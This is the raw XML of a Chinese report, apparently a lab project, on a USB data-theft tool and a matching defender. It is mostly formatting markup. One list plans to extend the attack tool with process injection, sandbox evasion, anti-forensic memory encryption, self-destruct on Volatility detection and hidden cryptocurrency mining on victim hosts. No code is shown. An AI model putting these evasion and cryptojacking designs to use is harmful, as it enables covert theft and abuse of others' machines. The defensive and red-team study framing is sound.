          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>日志加密存储与自动清理，减少数字取证痕迹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D26A1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr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C9C4FC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:outlineLvl w:val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升级方向</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65427E0C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U_killer.py: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>1.增强隐蔽性，将核心模块注入系统进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F1A6FA"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2.对抗检测，检测虚拟机/沙箱环境时进入休眠模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27778838"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3.智能决策，通过文件内容分析自动调整敏感关键词库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E9017"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4.反取证能力，内存加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B1CFA"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5.挖矿模块集成，闲置时段调用主机算力进行加密货币挖掘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26030B7F"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6.防御对抗，检测到内存分析工具（如Volatility）时自毁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6712FB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U_defender.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA29EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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增强检测能力,监控异常USB读写行为（如高频扫描、隐藏文件操作）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0089042C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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部署伪装敏感文件（触发恶意程序自曝）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6851BEE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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一键终止恶意进程+删除残留文件（支持批量处理）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自动修复被篡改的注册表项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B610646">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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硬件级防护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物理禁用非必要USB接口（BIOS/组策略）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78150E2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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部署硬件审计设备（记录所有USB数据传输</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45813521">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr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12E5638">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:outlineLvl w:val="0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应用展望</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46828BD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>企业安全增强</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB94B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>整合到EDR系统，实现自动化合规审计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34731439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>作为数据泄露防护（DLP）的应急采集终端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434CB4B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>红蓝对抗演进</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064612A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>构建ATT&amp;CK T1048（数据渗出）的模拟攻击链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2407171E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>测试网络隔离环境下物理边界的防御有效性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619FB1C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>应急响应扩展</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A0258C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>增加云同步模块，支持加密数据直传安全服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391AB36A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>集成漏洞利用检测功能，实现CVE-2023-XXXX等U盘协议漏洞的防御验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24761C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>技术融合方向</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4648E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>结合AI内容分析引擎，实现语义级敏感信息识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672128D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>适配Linux/macOS系统，构建跨平台数据采集方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8872C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr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8294B98">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>七</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>、参考文献</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AD553B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《中华人民共和国网络安全法》</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F04B5F"/>
    <w:p w14:paraId="30762BD9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A85010"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="88A85010"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="137"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="8B1BD4C0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8B1BD4C0"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="137"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="A01C02F9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A01C02F9"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="AEAA95C9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AEAA95C9"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="137"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="B35CD1D5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B35CD1D5"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="137"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="B4DB5076"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B4DB5076"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space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BD59D33A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BD59D33A"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing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D012BF52"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D012BF52"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="E378863B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E378863B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing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F9D18038"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F9D18038"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="137"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10">
    <w:nsid w:val="00AA3BFD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00AA3BFD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11">
    <w:nsid w:val="08CF4F81"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="08CF4F81"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12">
    <w:nsid w:val="0B640508"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0B640508"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13">
    <w:nsid w:val="0F47BE16"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0F47BE16"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:nsid w:val="1CDD7093"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1CDD7093"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="137"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15">
    <w:nsid w:val="26D94FBB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="26D94FBB"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="569" w:hanging="359"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16">
    <w:nsid w:val="2A3B5D29"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2A3B5D29"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="147"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17">
    <w:nsid w:val="302995B5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="302995B5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8">
    <w:nsid w:val="43716A7B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="43716A7B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9">
    <w:nsid w:val="43DF8C05"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="43DF8C05"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="137"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20">
    <w:nsid w:val="49AEFAC7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="49AEFAC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1">
    <w:nsid w:val="71D9C93F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71D9C93F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="303" w:firstLineChars="0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2">
    <w:nsid w:val="77400117"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="77400117"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="180"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="14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0845E8"/>
    <w:rsid w:val="0BCA0178"/>
    <w:rsid w:val="0FCB660F"/>
    <w:rsid w:val="1B5816A3"/>
    <w:rsid w:val="1F5210E5"/>
    <w:rsid w:val="32F146F5"/>
    <w:rsid w:val="512D2C17"/>
    <w:rsid w:val="66A65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687</Words>
  <Characters>1084</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1157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2025-03-09T06:25:00Z</dcterms:created>
  <dc:creator>石修</dc:creator>
  <cp:lastModifiedBy>石特修</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-02T13:52:48Z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eyJoZGlkIjoiMzRiYzg3M2IyMTliZWI5ZGRhZTRkNjc2ZDBjMmZhMzkiLCJ1c2VySWQiOiIxNTkyNjY5NjU0In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>B155942F3CA14729B4CDDF2695FBB8E1_12</vt:lpwstr>
  </property>
</Properties>
</file>